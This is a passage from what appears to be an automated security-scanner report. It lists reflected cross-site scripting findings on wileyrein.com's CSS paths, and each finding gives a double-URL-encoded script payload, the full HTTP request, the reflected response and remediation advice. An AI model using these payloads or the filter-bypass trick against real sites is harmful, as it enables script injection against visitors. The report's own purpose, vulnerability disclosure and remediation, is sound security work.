Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.base.cssa4008"><script>alert(1)</script>674bcd1bc31" value="">
...[SNIP]...

4.151. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csscfd19"><script>alert(1)</script>32dc5bc06f/ui/ui.core.css" value="">
...[SNIP]...

4.152. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uicac63"><script>alert(1)</script>5d010f954eb/ui.core.css" value="">
...[SNIP]...

4.153. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.core.cssc6878"><script>alert(1)</script>49980770f59" value="">
...[SNIP]...

4.154. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssfbf73"><script>alert(1)</script>f798e920d23/ui/ui.datepicker.css" value="">
...[SNIP]...

4.155. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uib6749"><script>alert(1)</script>54913b0be8b/ui.datepicker.css" value="">
...[SNIP]...

4.156. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.datepicker.css45672"><script>alert(1)</script>4f4fe8f9220" value="">
...[SNIP]...

4.157. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css36a08"><script>alert(1)</script>cbd401dfa0f/ui/ui.dialog.css" value="">
...[SNIP]...

4.158. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui8c042"><script>alert(1)</script>e88d9eeae49/ui.dialog.css" value="">
...[SNIP]...

4.159. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.dialog.cssbf81b"><script>alert(1)</script>ed17f52d89" value="">
...[SNIP]...

4.160. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css5cb17"><script>alert(1)</script>e53ecb908c0/ui/ui.progressbar.css" value="">
...[SNIP]...

4.161. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui612ba"><script>alert(1)</script>8b00486b426/ui.progressbar.css" value="">
...[SNIP]...

4.162. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.progressbar.css13c9c"><script>alert(1)</script>4a99b88c02e" value="">
...[SNIP]...

4.163. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css14fad"><script>alert(1)</script>9c0b0ee56be/ui/ui.resizable.css" value="">
...[SNIP]...

4.164. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
